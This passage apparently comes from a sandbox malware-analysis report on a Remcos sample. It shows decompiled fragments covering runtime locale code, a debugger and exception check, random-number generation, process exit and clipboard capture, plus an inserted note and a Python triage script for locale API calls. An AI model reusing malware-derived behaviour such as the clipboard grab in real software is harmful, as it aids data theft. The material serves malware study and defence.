                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: <@$GetLocaleInfoEx
                                                                      • API String ID: 2299586839-3030495286
                                                                      • Opcode ID: 0e0db81ea1fbb4284e44cdcda5cdd5e55a7d1dae45efcb42dc054bc0dd1b22e5
                                                                      • Instruction ID: 08b6c74300ceb697b9f10d41a8b1cd9753f5326917c7ca5d3ca67bc9f60801a1
                                                                      • Opcode Fuzzy Hash: 0e0db81ea1fbb4284e44cdcda5cdd5e55a7d1dae45efcb42dc054bc0dd1b22e5
                                                                      • Instruction Fuzzy Hash: B8F0F671A41608B7DB016F65DC05F6E7B65EB44711F00011AFC056A251DA798D20969D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0044DE34(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				short _v248;
                                                                      				signed int _v252;
                                                                      				intOrPtr _v256;
                                                                      				void* __ebp;
                                                                      				signed int _t50;
                                                                      				signed int _t58;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      				signed int _t72;
                                                                      				signed int _t73;
                                                                      				intOrPtr _t75;
                                                                      				signed int _t76;
                                                                      				signed int _t84;
                                                                      				signed int _t86;
                                                                      				signed int _t87;
                                                                      				signed int _t89;
                                                                      				intOrPtr _t90;
                                                                      				void* _t92;
                                                                      				intOrPtr* _t113;
                                                                      				void* _t117;
                                                                      				intOrPtr* _t119;
                                                                      				signed int _t123;
                                                                      				signed int _t124;
                                                                      				signed int _t125;
                                                                      				signed int _t126;
                                                                      				void* _t127;
                                                                      				signed int* _t129;
                                                                      				int _t132;
                                                                      				signed int _t133;
                                                                      				void* _t134;
                                                                      
                                                                      				_t50 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t50 ^ _t133;
                                                                      				_t92 = E00444255(__ebx, __ecx, __edx);
                                                                      				_t129 =  *(E00444255(_t92, __ecx, __edx) + 0x34c);
                                                                      				_t132 = E0044E15C(_a4);
                                                                      				asm("sbb ecx, ecx");
                                                                      				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                                                                      					_t58 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
                                                                      					_v252 = _v252 & 0x00000000;
                                                                      					__eflags = _t58;
                                                                      					if(_t58 != 0) {
                                                                      						L18:
                                                                      						__eflags = ( *_t129 & 0x00000300) - 0x300;
                                                                      						if(( *_t129 & 0x00000300) == 0x300) {
                                                                      							L39:
                                                                      							__eflags =  !( *_t129 >> 2) & 0x00000001;
                                                                      							L40:
                                                                      							return E004318FB(_v8 ^ _t133);
                                                                      						}
                                                                      						asm("sbb ecx, ecx");
                                                                      						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                      						__eflags = _t67;
                                                                      						if(_t67 != 0) {
                                                                      							_t69 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                                                      							__eflags = _t69;
                                                                      							if(_t69 != 0) {
                                                                      								__eflags =  *(_t92 + 0x60);
                                                                      								if( *(_t92 + 0x60) != 0) {
                                                                      									goto L39;
                                                                      								}
                                                                      								__eflags =  *(_t92 + 0x5c);
                                                                      								if( *(_t92 + 0x5c) == 0) {
                                                                      									goto L39;
                                                                      								}
                                                                      								_t72 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                                                      								__eflags = _t72;
                                                                      								if(_t72 != 0) {
                                                                      									goto L39;
                                                                      								}
                                                                      								_push(_t129);
                                                                      								_t73 = E0044E2B4(0, _t132, 0);
                                                                      								__eflags = _t73;
                                                                      								if(_t73 == 0) {
                                                                      									goto L39;
                                                                      								}
                                                                      								 *_t129 =  *_t129 | 0x00000100;
                                                                      								__eflags = _t129[1];
                                                                      								L37:
                                                                      								if(__eflags == 0) {
                                                                      									_t129[1] = _t132;
                                                                      								}
                                                                      								goto L39;
                                                                      							}
                                                                      							 *_t129 =  *_t129 | 0x00000200;
                                                                      							_t123 =  *_t129;
                                                                      							__eflags =  *(_t92 + 0x60) - _t69;
                                                                      							if( *(_t92 + 0x60) == _t69) {
                                                                      								__eflags =  *(_t92 + 0x5c) - _t69;
                                                                      								if( *(_t92 + 0x5c) == _t69) {
                                                                      									goto L23;
                                                                      								}
                                                                      								_t113 =  *((intOrPtr*)(_t92 + 0x50));
                                                                      								_v256 = _t113 + 2;
                                                                      								do {
                                                                      									_t75 =  *_t113;
                                                                      									_t113 = _t113 + 2;
                                                                      									__eflags = _t75 - _v252;
                                                                      								} while (_t75 != _v252);
                                                                      								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
                                                                      								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
                                                                      									_t69 = 0;
                                                                      									goto L23;
                                                                      								}
                                                                      								_push(_t129);
                                                                      								_t76 = E0044E2B4(_t92, _t132, 1);
                                                                      								__eflags = _t76;
                                                                      								if(_t76 == 0) {
                                                                      									goto L39;
                                                                      								}
                                                                      								 *_t129 =  *_t129 | 0x00000100;
                                                                      								_t69 = 0;
                                                                      								L24:
                                                                      								__eflags = _t129[1] - _t69;
                                                                      								goto L37;
                                                                      							}
                                                                      							L23:
                                                                      							_t124 = _t123 | 0x00000100;
                                                                      							__eflags = _t124;
                                                                      							 *_t129 = _t124;
                                                                      							goto L24;
                                                                      						}
                                                                      						 *_t129 = _t67;
                                                                      						L2:
                                                                      						goto L40;
                                                                      					}
                                                                      					asm("sbb eax, eax");
                                                                      					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                      					__eflags = _t84;
                                                                      					if(_t84 == 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t86 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                                                      					_pop(_t117);
                                                                      					__eflags = _t86;
                                                                      					if(_t86 != 0) {
                                                                      						__eflags =  *_t129 & 0x00000002;
                                                                      						if(( *_t129 & 0x00000002) != 0) {
                                                                      							goto L18;
                                                                      						}
                                                                      						__eflags =  *(_t92 + 0x5c);
                                                                      						if( *(_t92 + 0x5c) == 0) {
                                                                      							L14:
                                                                      							_t125 =  *_t129;
                                                                      							__eflags = _t125 & 0x00000001;
                                                                      							if((_t125 & 0x00000001) != 0) {
                                                                      								goto L18;
                                                                      							}
                                                                      							_t87 = E0044E290(_t132);
                                                                      							__eflags = _t87;
                                                                      							if(_t87 == 0) {
                                                                      								goto L18;
                                                                      							}
                                                                      							_t126 = _t125 | 0x00000001;
                                                                      							__eflags = _t126;
                                                                      							 *_t129 = _t126;
                                                                      							goto L17;
                                                                      						}
                                                                      						_t89 = E0043AB1E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
                                                                      						_t134 = _t134 + 0xc;
                                                                      						__eflags = _t89;
                                                                      						if(_t89 != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						 *_t129 =  *_t129 | 0x00000002;
                                                                      						__eflags =  *_t129;
                                                                      						_t129[2] = _t132;
                                                                      						_t119 =  *((intOrPtr*)(_t92 + 0x50));
                                                                      						_t127 = _t119 + 2;
                                                                      						do {
                                                                      							_t90 =  *_t119;
                                                                      							_t119 = _t119 + 2;
                                                                      							__eflags = _t90 - _v252;
                                                                      						} while (_t90 != _v252);
                                                                      						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
                                                                      						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
                                                                      							_t129[1] = _t132;
                                                                      						}
                                                                      					} else {
                                                                      						 *_t129 =  *_t129 | 0x00000304;
                                                                      						_t129[1] = _t132;
                                                                      						L17:
                                                                      						_t129[2] = _t132;
                                                                      					}
                                                                      					goto L18;
                                                                      				}
                                                                      				L1:
                                                                      				 *_t129 =  *_t129 & 0x00000000;
                                                                      				goto L2;
                                                                      			}
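
Editor's note on the GetLocaleInfoW sites listed above. The LIBCMT and LIBVCRUNTIME tags on _free, _abort and _wcschr are the sandbox's own identification of statically linked VC runtime code, and the two masked adds in E0044DE34, (x & 0xfffff005) + 0x1002 and (x & 0xfffff002) + 0x1001, follow an sbb reg,reg that leaves the register as 0 or 0xffffffff, so under 32-bit arithmetic they can only produce 0x1002 or 0x7 (LOCALE_SENGLISHCOUNTRYNAME or LOCALE_SABBREVCTRYNAME) and 0x1001 or 0x3 (LOCALE_SENGLISHLANGUAGENAME or LOCALE_SABBREVLANGNAME), read into a 0x78-WCHAR (240-byte) stack buffer. That is consistent with the locale-name matching path of the runtime's setlocale() implementation rather than sample-specific logic, so the "query locales information" signature should be weighed against where the calls sit before it is read as a geofencing check; the Remcos configuration, injection and credential-theft findings are what carry the verdict.

The script below is an added example, not part of the Joe Sandbox report and not code from the sample. It parses "APIs" blocks in the report's bullet format, names the LCTYPE argument of GetLocaleInfoW where the stack capture resolved it, resolves the masked-add idiom to its two possible LCTYPEs, and marks a function as runtime boilerplate when every API it touches belongs to a hand-picked set of setlocale-path APIs. The line regex, the CRT_LOCALE_APIS set and the verdict labels are assumptions of the example; the sample input is the two APIs blocks above, copied verbatim.

```python
"""Triage helper for the "APIs" blocks of a Joe Sandbox function listing.
Added example; not from the report or the sample.  _API_RE, CRT_LOCALE_APIS
and the verdict labels are assumptions of this example."""
import re
from dataclasses import dataclass
from typing import List, Optional

# LCTYPE values from winnls.h for the constants that occur in the listings.
LCTYPE_NAMES = {
    0x0002: "LOCALE_SLANGUAGE",
    0x0003: "LOCALE_SABBREVLANGNAME",
    0x0007: "LOCALE_SABBREVCTRYNAME",
    0x1001: "LOCALE_SENGLISHLANGUAGENAME",
    0x1002: "LOCALE_SENGLISHCOUNTRYNAME",
}
# Hand-picked (assumption): APIs reached from the VC runtime's setlocale() path.
CRT_LOCALE_APIS = {
    "GetLocaleInfoW", "GetLocaleInfoEx", "IsValidCodePage", "IsValidLocale",
    "EnumSystemLocalesW", "GetUserDefaultLCID", "GetLastError", "SetLastError",
    "_wcschr", "_free", "_abort",
}
# One "• Api.MODULE(args), ref: ADDR" bullet, optionally prefixed with
# "Part of subcall function ADDR:"; LIBCMT-style entries carry no args.
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]            # raw stack tokens as captured; "?" = unresolved
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when reported via a subcall


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse every API bullet in a block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def lctype_of(call: ApiCall) -> Optional[str]:
    """Name the LCTYPE (2nd argument) of a GetLocaleInfoW call when the sandbox
    captured a concrete value; None for "?" or for any other API."""
    if call.name != "GetLocaleInfoW" or len(call.args) < 2:
        return None
    try:
        value = int(call.args[1], 16)
    except ValueError:
        return None
    return LCTYPE_NAMES.get(value, "LCTYPE 0x%x" % value)


def lctype_candidates(mask: int, addend: int) -> set:
    """Resolve the idiom the decompiler rendered as (~flag & MASK) + ADDEND:
    the preceding 'sbb reg, reg' leaves 0 or 0xffffffff, so the LCTYPE actually
    passed is one of exactly two 32-bit values."""
    return {((r & mask) + addend) & 0xFFFFFFFF for r in (0, 0xFFFFFFFF)}


def triage(calls: List[ApiCall]) -> str:
    """'crt-locale-boilerplate' when every API (own and subcall) is on the
    setlocale path; otherwise 'review'.  An empty block is left for review."""
    names = {c.name for c in calls}
    if names and names <= CRT_LOCALE_APIS:
        return "crt-locale-boilerplate"
    return "review"


def summarize(text: str) -> dict:
    calls = parse_api_block(text)
    return {
        "apis": sorted({c.name for c in calls}),
        "lctypes": sorted(n for n in (lctype_of(c) for c in calls) if n),
        "verdict": triage(calls),
    }


# Constructed input: the two APIs blocks shown above, copied verbatim.
BLOCK_A = """\
  • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
  • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
  • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
  • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00440B33,?,?,?,?,0044058A,?,00000004), ref: 0044DB2B
• _wcschr.LIBVCRUNTIME ref: 0044DBBB
• _wcschr.LIBVCRUNTIME ref: 0044DBC9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00440B33,00000000,00440C53), ref: 0044DC6C
"""
BLOCK_B = """\
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0044058A,?,00000004), ref: 00444980
"""

if __name__ == "__main__":
    for label, block in (("0044DAF6", BLOCK_A), ("00444980", BLOCK_B)):
        print(label, summarize(block))
    # The two masked adds in E0044DE34 (country name, then language name):
    print({LCTYPE_NAMES[v] for v in lctype_candidates(0xFFFFF005, 0x1002)})
    print({LCTYPE_NAMES[v] for v in lctype_candidates(0xFFFFF002, 0x1001)})
```

The verdict is a triage hint only: a function whose whole API surface is runtime locale plumbing is deprioritised, while anything outside CRT_LOCALE_APIS (process, thread, registry or network APIs) falls through to manual review. The "?" tokens are left unresolved on purpose; the sandbox records stack contents at capture time and a missing value is not evidence either way.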
Statement address column (Joe Sandbox IDA plugin) for E0044DE34: addresses 0x0044de3f through 0x0044e081 as extracted; the per-statement pairing did not survive extraction.
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044e048
                                                                      0x0044e04d
                                                                      0x0044e055
                                                                      0x0044e057
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044e059
                                                                      0x0044e05f
                                                                      0x0044e062
                                                                      0x0044e062
                                                                      0x0044e064
                                                                      0x0044e064
                                                                      0x00000000
                                                                      0x0044e062
                                                                      0x0044dfbf
                                                                      0x0044dfc5
                                                                      0x0044dfc7
                                                                      0x0044dfca
                                                                      0x0044dfdc
                                                                      0x0044dfdf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044dfe1
                                                                      0x0044dfe7
                                                                      0x0044dfed
                                                                      0x0044dfed
                                                                      0x0044dff0
                                                                      0x0044dff3
                                                                      0x0044dff3
                                                                      0x0044e004
                                                                      0x0044e007
                                                                      0x0044e023
                                                                      0x00000000
                                                                      0x0044e023
                                                                      0x0044e009
                                                                      0x0044e00d
                                                                      0x0044e015
                                                                      0x0044e017
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044e019
                                                                      0x0044e01f
                                                                      0x0044dfd4
                                                                      0x0044dfd4
                                                                      0x00000000
                                                                      0x0044dfd4
                                                                      0x0044dfcc
                                                                      0x0044dfcc
                                                                      0x0044dfcc
                                                                      0x0044dfd2
                                                                      0x00000000
                                                                      0x0044dfd2
                                                                      0x0044dfa3
                                                                      0x0044de95
                                                                      0x00000000
                                                                      0x0044de97
                                                                      0x0044decb
                                                                      0x0044ded9
                                                                      0x0044dedf
                                                                      0x0044dee1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044deed
                                                                      0x0044def3
                                                                      0x0044def4
                                                                      0x0044def6
                                                                      0x0044df03
                                                                      0x0044df06
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044df08
                                                                      0x0044df0c
                                                                      0x0044df50
                                                                      0x0044df50
                                                                      0x0044df52
                                                                      0x0044df55
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044df58
                                                                      0x0044df5e
                                                                      0x0044df60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044df62
                                                                      0x0044df62
                                                                      0x0044df65
                                                                      0x00000000
                                                                      0x0044df65
                                                                      0x0044df1b
                                                                      0x0044df20
                                                                      0x0044df23
                                                                      0x0044df25
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044df27
                                                                      0x0044df27
                                                                      0x0044df2a
                                                                      0x0044df2d
                                                                      0x0044df30
                                                                      0x0044df33
                                                                      0x0044df33
                                                                      0x0044df36
                                                                      0x0044df39
                                                                      0x0044df39
                                                                      0x0044df46
                                                                      0x0044df49
                                                                      0x0044df4b
                                                                      0x0044df4b
                                                                      0x0044def8
                                                                      0x0044def8
                                                                      0x0044defe
                                                                      0x0044df67
                                                                      0x0044df67
                                                                      0x0044df67
                                                                      0x00000000
                                                                      0x0044def6
                                                                      0x0044de92
                                                                      0x0044de92
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 004442B4
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044DE88
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044DED9
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044DF99
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 2829624132-0
                                                                      • Opcode ID: 282798828c2090434eda66c946f1a0a829911001e56b45a11fccb827842a3a93
                                                                      • Instruction ID: d0f19ad155b35f457c489507ed77437171f7a75c9abad1e430859b1a56a4cb88
                                                                      • Opcode Fuzzy Hash: 282798828c2090434eda66c946f1a0a829911001e56b45a11fccb827842a3a93
                                                                      • Instruction Fuzzy Hash: E761B0719006179BFB289F25CC82BBA77A8FF04304F1440BAE916C6685F77CD995CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00438462(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				char _v0;
                                                                      				signed int _v8;
                                                                      				intOrPtr _v524;
                                                                      				intOrPtr _v528;
                                                                      				void* _v532;
                                                                      				intOrPtr _v536;
                                                                      				char _v540;
                                                                      				intOrPtr _v544;
                                                                      				intOrPtr _v548;
                                                                      				intOrPtr _v552;
                                                                      				intOrPtr _v556;
                                                                      				intOrPtr _v560;
                                                                      				intOrPtr _v564;
                                                                      				intOrPtr _v568;
                                                                      				intOrPtr _v572;
                                                                      				intOrPtr _v576;
                                                                      				intOrPtr _v580;
                                                                      				intOrPtr _v584;
                                                                      				char _v724;
                                                                      				intOrPtr _v792;
                                                                      				intOrPtr _v800;
                                                                      				char _v804;
                                                                      				intOrPtr _v808;
                                                                      				char _v812;
                                                                      				signed int _t40;
                                                                      				char* _t47;
                                                                      				intOrPtr _t49;
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t62;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr _t67;
                                                                      				int _t68;
                                                                      				intOrPtr _t69;
                                                                      				signed int _t70;
                                                                      
                                                                      				_t69 = __esi;
                                                                      				_t67 = __edi;
                                                                      				_t66 = __edx;
                                                                      				_t61 = __ebx;
                                                                      				_t40 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_t41 = _t40 ^ _t70;
                                                                      				_v8 = _t40 ^ _t70;
                                                                      				if(_a4 != 0xffffffff) {
                                                                      					_push(_a4);
                                                                      					E004314E2(_t41);
                                                                      					_pop(_t62);
                                                                      				}
                                                                      				E004337A0(_t67,  &_v804, 0, 0x50);
                                                                      				E004337A0(_t67,  &_v724, 0, 0x2cc);
                                                                      				_v812 =  &_v804;
                                                                      				_t47 =  &_v724;
                                                                      				_v808 = _t47;
                                                                      				_v548 = _t47;
                                                                      				_v552 = _t62;
                                                                      				_v556 = _t66;
                                                                      				_v560 = _t61;
                                                                      				_v564 = _t69;
                                                                      				_v568 = _t67;
                                                                      				_v524 = ss;
                                                                      				_v536 = cs;
                                                                      				_v572 = ds;
                                                                      				_v576 = es;
                                                                      				_v580 = fs;
                                                                      				_v584 = gs;
                                                                      				asm("pushfd");
                                                                      				_pop( *_t22);
                                                                      				_v540 = _v0;
                                                                      				_t25 =  &_v0; // 0x4
                                                                      				_t49 = _t25;
                                                                      				_v528 = _t49;
                                                                      				_v724 = 0x10001;
                                                                      				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                      				_v804 = _a8;
                                                                      				_v800 = _a12;
                                                                      				_v792 = _v0;
                                                                      				_t68 = IsDebuggerPresent();
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				_t36 =  &_v812; // -808
                                                                      				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                      					_push(_a4);
                                                                      					E004314E2(_t57);
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t70);
                                                                      			}

                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043855A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00438564
                                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0000000A), ref: 00438571
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 60d780e7756b548f83dad1740ac2ae1f518c3056e7f36b6710a0de99be365804
                                                                      • Instruction ID: d8ead26e8eb37d6fb88bd96035dd9e947152768fc60bb89449107110943e61ac
                                                                      • Opcode Fuzzy Hash: 60d780e7756b548f83dad1740ac2ae1f518c3056e7f36b6710a0de99be365804
                                                                      • Instruction Fuzzy Hash: 8431D77490131C9BCB21DF68D98879DB7B4BF08310F5056EAE80CA7261EB349F818F49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00430185(HCRYPTPROV* __ecx, BYTE* __edx) {
                                                                      				int _v12;
                                                                      				void* _t6;
                                                                      				BYTE* _t9;
                                                                      				long** _t10;
                                                                      
                                                                      				_t10 = __ecx;
                                                                      				_t9 = __edx;
                                                                      				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
                                                                      					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
                                                                      						CryptReleaseContext( *_t10, 0);
                                                                      						return 0;
                                                                      					}
                                                                      					_push(0xffffff98);
                                                                      					L2:
                                                                      					_pop(_t6);
                                                                      					return _t6;
                                                                      				}
                                                                      				_push(0xffffff99);
                                                                      				goto L2;
                                                                      			}

                                                                      APIs
                                                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,0042FE0D,00000034,?,?,00000000), ref: 00430197
                                                                      • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,0042FEA0,00000000,?,00000000), ref: 004301AD
                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,0042FEA0,00000000,?,00000000,0041ABED), ref: 004301BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                      • String ID:
                                                                      • API String ID: 1815803762-0
                                                                      • Opcode ID: e450df584ea5b7981e6163142a62199a4d5d447799bcb4ef5617650616cf7cca
                                                                      • Instruction ID: 8c19ee37d78214cc7255f079126727531d1bf265bd319b2ac3cca30d71e1d02a
                                                                      • Opcode Fuzzy Hash: e450df584ea5b7981e6163142a62199a4d5d447799bcb4ef5617650616cf7cca
                                                                      • Instruction Fuzzy Hash: C9E06D31248310BEEF300E11AC28F172AA49BC9B65F31072AB255A80E4C2628841951C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0043F394(int _a4) {
                                                                      				void* _t14;
                                                                      				void* _t16;
                                                                      
                                                                      				if(E00444D09(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                      					TerminateProcess(GetCurrentProcess(), _a4);
                                                                      				}
                                                                      				E0043F419(_t14, _t16, _a4);
                                                                      				ExitProcess(_a4);
                                                                      			}

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002,00000000), ref: 0043F3B5
                                                                      • TerminateProcess.KERNEL32(00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002,00000000), ref: 0043F3BC
                                                                      • ExitProcess.KERNEL32 ref: 0043F3CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: dfe48a097deb0ce11edccffe6d2230c46e7e30a02a52b9740d55dd81f0a25627
                                                                      • Instruction ID: 4d6c8b4d373b1f8d15033edefb586c9001b308c8244c70771d91f277b0f902be
                                                                      • Opcode Fuzzy Hash: dfe48a097deb0ce11edccffe6d2230c46e7e30a02a52b9740d55dd81f0a25627
                                                                      • Instruction Fuzzy Hash: 75E08C31400218AFCF016F20ED08A493B29EF9438AF005076FC098B232DB39ECD2CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00409D9C(intOrPtr _a4) {
                                                                      				intOrPtr _v0;
                                                                      				void* _t8;
                                                                      				void* _t10;
                                                                      				void* _t11;
                                                                      				void* _t12;
                                                                      
                                                                      				if(OpenClipboard(0) == 0) {
                                                                      					L3:
                                                                      					_push(0x4610ec);
                                                                      				} else {
                                                                      					_t11 = GetClipboardData(0xd);
                                                                      					CloseClipboard();
                                                                      					if(_t11 == 0) {
                                                                      						goto L3;
                                                                      					} else {
                                                                      						_push(_t11);
                                                                      					}
                                                                      				}
                                                                      				E0040413E(_t8, _a4, _t10, _t12);
                                                                      				return _v0;
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Clipboard$CloseDataOpen
                                                                      • String ID:
                                                                      • API String ID: 2058664381-0
                                                                      • Opcode ID: 17b2bec9b75883c6a8f5f3f89a5873973adf657650172498db161f82f9f16dcc
                                                                      • Instruction ID: b6001045a0f8cdf14df5ef5e9a4310174d621cee8e19ab2e889570e8d57e3b75
                                                                      • Opcode Fuzzy Hash: 17b2bec9b75883c6a8f5f3f89a5873973adf657650172498db161f82f9f16dcc
                                                                      • Instruction Fuzzy Hash: 37E0C270388321D7D6205BA0EC0CB4F7A549F80B13F00403AB909AA2E6C734DC80C6AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E00431590(intOrPtr __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed char _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _t51;
                                                                      				signed int _t53;
